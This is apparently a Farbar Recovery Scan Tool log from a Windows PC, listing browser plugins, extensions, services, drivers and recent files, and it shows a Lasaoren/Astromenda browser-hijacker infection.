{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File Handler: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - No File Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - No File Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) Handler-x32: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - C:\Program Files (x86)\Intuit\QuickBooks 2010\HelpAsyncPluggableProtocol.dll (Intuit, Inc.) Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 FireFox: ======== FF ProfilePath: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default FF DefaultSearchEngine: Lasaoren FF SearchEngineOrder.3: Bing FF SelectedSearchEngine: Lasaoren FF Homepage: hxxp://lasaoren.com/?f=1&a=lrn_dnldstr_14_46_ff&cd=2xzuyetn2y1l1qzu0etd0c0bye0eyb0d0czyydzytbtctbtdtn0d0tzu0stctdyeybtn1l2xzutatfyctftctftdtn1l1czutcyetbzytdyd1v1ttn1l1g1b1v1n2y1l1qzu2syc0c0btayd0fzyyetgzztb0etbtgzzyezztctgybyctcyetgtctatczzzyybtctb0b0b0ftd2qtn1m1f1b2z1v1n2y1l1qzu2stcybzz0byc0byd0atg0dtd0e0ctgyetd0a0etgzyybyezztg0eyd0fta0d0dta0ftdzzzyye2q&cr=90030310&ir= FF Keyword.URL: hxxp://www.bing.com/search?FORM=UP97DF&PC=UP97&q= FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_223.dll () FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll No File FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_223.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @cnw.com/cnwplugin -> C:\Program Files (x86)\AnyMeeting Plug-in\npcnwplugin.dll (AnyMeeting, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll (Alcatel-Lucent) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Ryan\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online) FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: @hulu.com/Hulu Desktop -> C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.9.1\npHDPlg.dll (Hulu LLC) FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll (TD Ameritrade) FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll (TD Ameritrade) FF user.js: detected! => C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\user.js FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC) FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\bingp.xml FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\Lasaoren.xml FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\safesearch.xml FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\ddg.xml FF Extension: LastPass - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\support@lastpass.com [2014-08-18] FF Extension: Evernote Web Clipper - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800} [2014-01-10] FF Extension: Firebug - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\firebug@software.joehewitt.com.xpi [2012-12-05] FF Extension: Awesome screenshot: Capture and Annotate - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\jid0-GXjLLfbCoAx0LcltEdFrEkQdQPI@jetpack.xpi [2013-07-30] FF Extension: Yesware Email Tracking - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\jid1-T5mdAATMX3urKA@jetpack.xpi [2013-05-20] FF Extension: YSlow - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\yslow@yahoo-inc.com.xpi [2012-12-05] FF Extension: Lasaoren - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\{0760faf4-8d0b-49d1-bbac-d05eb1ac32c7}.xpi [2014-11-12] FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-11-10] FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.2.0.38\coFFPlgn FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.2.0.38\coFFPlgn [2014-11-12] FF Extension: No Name - {2D3F3651-74B9-4795-BDEC-6DA2F431CB62} [Not Found] Chrome: ======= CHR HomePage: Default -> hxxp://Lasaoren.com/?f=1&a=lrn_dnldstr_14_46_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0StCtDyEyBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyC0C0BtAyD0FzyyEtGzztB0EtBtGzzyEzztCtGyByCtCyEtGtCtAtCzzzyyBtCtB0B0B0FtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCyBzz0ByC0ByD0AtG0DtD0E0CtGyEtD0A0EtGzyyByEzztG0EyD0FtA0D0DtA0FtDzzzyyE2Q&cr=90030310&ir= CHR StartupUrls: Default -> "hxxp://Lasaoren.com/?f=7&a=lrn_dnldstr_14_46_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0StCtDyEyBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyC0C0BtAyD0FzyyEtGzztB0EtBtGzzyEzztCtGyByCtCyEtGtCtAtCzzzyyBtCtB0B0B0FtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCyBzz0ByC0ByD0AtG0DtD0E0CtGyEtD0A0EtGzyyByEzztG0EyD0FtA0D0DtA0FtDzzzyyE2Q&cr=90030310&ir=","hxxp://astromenda.com/?f=7&a=ast_frg01_14_49_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0SzyyDtDtN1L2XzutAtFtDtFtCtDtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEtD0DtBtByEzz0AtGtA0Ezy0DtGtA0EzytBtG0CtA0AtBtGtD0CtAyCtA0C0EtCyE0E0F0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StByEyEtAyB0CtB0AtGtBzy0FtDtGyEyE0E0EtGzytAtByCtG0DzzyC0CzzzztByBtD0CyByB2Q&cr=1230190011&ir=" CHR DefaultSearchKeyword: Default -> Lasaoren.com CHR DefaultSearchURL: Default -> http://Lasaoren.com/...cr=90030310&ir= CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms} CHR Profile: C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Drive) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-11-14] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-08-06] CHR Extension: (YouTube) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-11-14] CHR Extension: (Google Search) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-11-14] CHR Extension: (LastPass: Free Password Manager) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2012-11-17] CHR Extension: (Norton Identity Safe) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-14] CHR Extension: (Norton Security Toolbar) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2012-11-14] CHR Extension: (Google Wallet) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-23] CHR Extension: (Gmail) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-11-14] CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-01] CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - C:\Program Files (x86)\LastPass\lpchrome.crx [2012-11-14] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14] CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-01] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation) R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation) R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed] R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [File not signed] R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation) R2 pcCMService; C:\Program Files (x86)\Common Files\Motive\pcCMService.exe [361472 2012-06-18] (Alcatel-Lucent) [File not signed] R2 pcCMService64; C:\Program Files\Common Files\Motive\pcCMService.exe [441344 2012-06-18] (Alcatel-Lucent) [File not signed] R2 pcServiceHost; C:\Program Files (x86)\Common Files\Motive\pcServiceHost.exe [342016 2012-06-14] (Alcatel-Lucent) [File not signed] R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-02-01] (Intuit) [File not signed] S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2009-07-23] (Intuit Inc.) [File not signed] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\BASHDefs\20141107.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation) R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-24] (Symantec Corporation) R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-10-06] (Symantec Corporation) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-18] (Symantec Corporation) R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\IPSDefs\20141111.001\IDSvia64.sys [633560 2014-08-27] (Symantec Corporation) R3 L6TPortB; C:\Windows\System32\Drivers\L6TPortB64.sys [894336 2010-03-09] (Line 6) R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [131800 2014-11-12] (Malwarebytes Corporation) S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed] S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed] R3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\VirusDefs\20141111.034\ENG64.SYS [129752 2014-10-06] (Symantec Corporation) R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\VirusDefs\20141111.034\EX64.SYS [2137304 2014-10-06] (Symantec Corporation) R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation) R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation) R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-10-29] (Symantec Corporation) R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-03] (Symantec Corporation) R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-04-05] (Symantec Corporation) R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation) R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation) S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X] S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-12 15:45 - 2014-11-12 15:45 - 00042051 _____ () C:\Users\Ryan\Downloads\Addition.txt 2014-11-12 15:43 - 2014-11-12 16:22 - 00034003 _____ () C:\Users\Ryan\Downloads\FRST.txt 2014-11-12 15:43 - 2014-11-12 16:21 - 00000000 ____D () C:\FRST 2014-11-12 15:43 - 2014-11-12 15:43 - 02116096 _____ (Farbar) C:\Users\Ryan\Downloads\FRST64.exe 2014-11-12 13:17 - 2014-11-12 13:17 - 00000044 _____ () C:\Users\Ryan\AppData\Roaming\WB.CFG 2014-11-12 12:22 - 2014-11-12 12:22 - 00001164 _____ () C:\Users\Ryan\Desktop\Continue Free Download Installation.lnk 2014-11-12 12:16 - 2014-11-12 12:17 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren 2014-11-12 12:16 - 2014-11-12 12:16 - 24489269 _____ () C:\Users\Ryan\Downloads\setup_free.exe 2014-11-12 12:16 - 2014-11-12 12:16 - 00000000 ____D () C:\ProgramData\BoostSoftware 2014-11-12 12:13 - 2014-11-12 12:13 - 00796616 _____ ( ) C:\Users\Ryan\Downloads\Free_Download_Setup(1).exe 2014-11-12 12:12 - 2014-11-12 12:12 - 00796616 _____ ( ) C:\Users\Ryan\Downloads\Free_Download_Setup.exe 2014-11-12 11:25 - 2014-11-12 12:06 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2014-11-12 11:21 - 2014-11-12 11:21 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Downloads\mbar-1.08.0.1001(1).exe 2014-11-12 11:16 - 2014-11-12 11:17 - 00000000 ____D () C:\Users\Ryan\Desktop\CB Logos 2014-11-12 11:11 - 2014-11-12 11:17 - 00000000 ____D () C:\Users\Ryan\Desktop\New folder 2014-11-12 11:05 - 2014-11-12 11:09 - 00000000 ____D () C:\Users\Ryan\Desktop\mysearchlinkspics 2014-11-12 11:01 - 2014-11-12 12:06 - 00000000 ____D () C:\Users\Ryan\Desktop\mbar 2014-11-12 11:00 - 2014-11-12 11:00 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Downloads\mbar-1.08.0.1001.exe 2014-11-12 09:18 - 2014-11-12 09:18 - 04909382 _____ () C:\Users\Ryan\Downloads\mbam-chameleon-3.1.7.0(1).zip 2014-11-12 02:14 - 2014-11-12 11:25 - 00131800 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-11-12 02:13 - 2014-11-12 11:23 - 00096472 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-11-12 02:13 - 2014-11-12 02:13 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-11-12 02:13 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-11-12 02:13 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-11-12 02:12 - 2014-11-12 02:12 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Ryan\Downloads\mbam-setup-2.0.3.1025.exe 2014-11-12 02:09 - 2014-11-12 02:09 - 04909382 _____ () C:\Users\Ryan\Downloads\mbam-chameleon-3.1.7.0.zip 2014-11-11 16:34 - 2014-11-11 16:34 - 00001624 _____ () C:\Users\Ryan\Desktop\Shortcut to scrapebox.exe.lnk 2014-11-11 16:31 - 2014-11-11 16:31 - 00425984 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Ryan\Downloads\libeay32.dll 2014-11-11 16:31 - 2014-11-11 16:31 - 00232960 _____ (GnuWin32 <http://gnuwin32.sourceforge.net>) C:\Users\Ryan\Downloads\libssl32.dll 2014-11-11 16:31 - 2014-11-11 16:31 - 00200704 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Ryan\Downloads\ssleay32.dll 2014-11-10 08:12 - 2014-11-10 08:12 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-11-08 22:23 - 2014-11-08 22:24 - 01701816 _____ () C:\Windows\Minidump\110814-61589-01.dmp 2014-11-07 14:22 - 2014-11-11 16:49 - 00000000 ____D () C:\Users\Ryan\Downloads\Plugins 2014-11-07 14:22 - 2014-11-11 16:49 - 00000000 ____D () C:\Users\Ryan\Downloads\Addons 2014-11-07 14:22 - 2014-11-11 16:31 - 00000000 ____D () C:\Users\Ryan\Downloads\Configuration 2014-11-07 14:22 - 2014-09-02 01:42 - 04072384 _____ (Softtouch Software Design) C:\Users\Ryan\Downloads\scrapebox.exe 2014-11-07 14:22 - 2012-02-17 17:58 - 00000000 ____D () C:\Users\Ryan\Downloads\Blacklist 2014-11-07 14:22 - 2012-02-02 20:43 - 00000000 ____D () C:\Users\Ryan\Downloads\RSS Submission 2014-11-07 14:22 - 2011-05-05 18:42 - 00000000 ____D () C:\Users\Ryan\Downloads\Comment Poster 2014-11-07 14:22 - 2011-04-13 01:21 - 00482760 _____ (Softtouch Software Design) C:\Users\Ryan\Downloads\sbupdate.exe 2014-11-07 14:22 - 2009-12-16 15:36 - 00000000 ____D () C:\Users\Ryan\Downloads\Projects 2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Trackbacks 2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Proxies 2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Ping Mode 2014-11-07 14:21 - 2014-11-07 14:21 - 05230370 _____ () C:\Users\Ryan\Downloads\scrapebox.zip 2014-11-07 14:21 - 2014-11-07 14:21 - 00000000 ____D () C:\Users\Ryan\Downloads\scrapebox 2014-11-07 07:52 - 2014-11-07 07:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud 2014-11-04 14:03 - 2014-11-04 14:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2014-11-03 19:16 - 2014-11-03 19:16 - 00091068 _____ () C:\Users\Ryan\Documents\6 month top 250 stock gainers.xlsx 2014-11-03 19:09 - 2014-11-03 19:10 - 00091654 _____ () C:\Users\Ryan\Documents\3 month percent average top 250.xlsx 2014-11-03 13:04 - 2014-11-03 13:04 - 00001847 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk 2014-11-03 13:04 - 2014-11-03 13:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2014-11-03 13:04 - 2014-11-03 13:04 - 00000000 ____D () C:\Program Files (x86)\QuickTime 2014-11-03 13:02 - 2014-11-03 13:02 - 00001785 _____ () C:\Users\Public\Desktop\iTunes.lnk 2014-11-03 13:02 - 2014-11-03 13:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\Program Files\iTunes 2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\Program Files (x86)\iTunes 2014-11-03 12:59 - 2014-11-03 12:59 - 00000000 ____D () C:\Program Files\iPod 2014-11-03 12:13 - 2014-11-03 12:13 - 00001034 _____ () C:\Users\Ryan\Desktop\Apple Mobile Device USB Driver - Shortcut.lnk 2014-11-03 12:09 - 2014-11-03 12:09 - 00000000 ____D () C:\Windows\en 2014-11-03 12:08 - 2014-11-03 12:08 - 00001307 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk 2014-11-03 12:07 - 2014-11-03 12:07 - 00002488 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk 2014-11-03 12:04 - 2014-11-03 12:04 - 00002178 _____ () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk 2014-11-03 09:46 - 2014-11-03 09:47 - 72331056 _____ (Apple Inc.) C:\Users\Ryan\Downloads\iCloudSetup.exe 2014-10-31 13:34 - 2014-10-31 13:36 - 122418480 _____ (Apple Inc.) C:\Users\Ryan\Downloads\iTunes64Setup.exe 2014-10-14 22:52 - 2014-09-28 16:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-10-14 22:52 - 2014-08-18 19:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2014-10-14 22:52 - 2014-08-18 19:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2014-10-14 22:52 - 2014-08-18 19:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2014-10-14 22:52 - 2014-08-18 19:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2014-10-14 22:52 - 2014-08-18 19:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2014-10-14 22:52 - 2014-08-18 19:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2014-10-14 22:52 - 2014-08-18 19:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2014-10-14 22:52 - 2014-08-18 19:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2014-10-14 22:52 - 2014-08-18 19:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2014-10-14 22:52 - 2014-08-18 19:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2014-10-14 22:52 - 2014-08-18 18:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2014-10-14 22:52 - 2014-08-18 18:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2014-10-14 22:52 - 2014-08-18 18:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2014-10-14 22:52 - 2014-07-06 18:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll 2014-10-14 22:52 - 2014-07-06 18:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll 2014-10-14 22:52 - 2014-07-06 18:07 - 00229376 _____ (Microsoft Corporation) 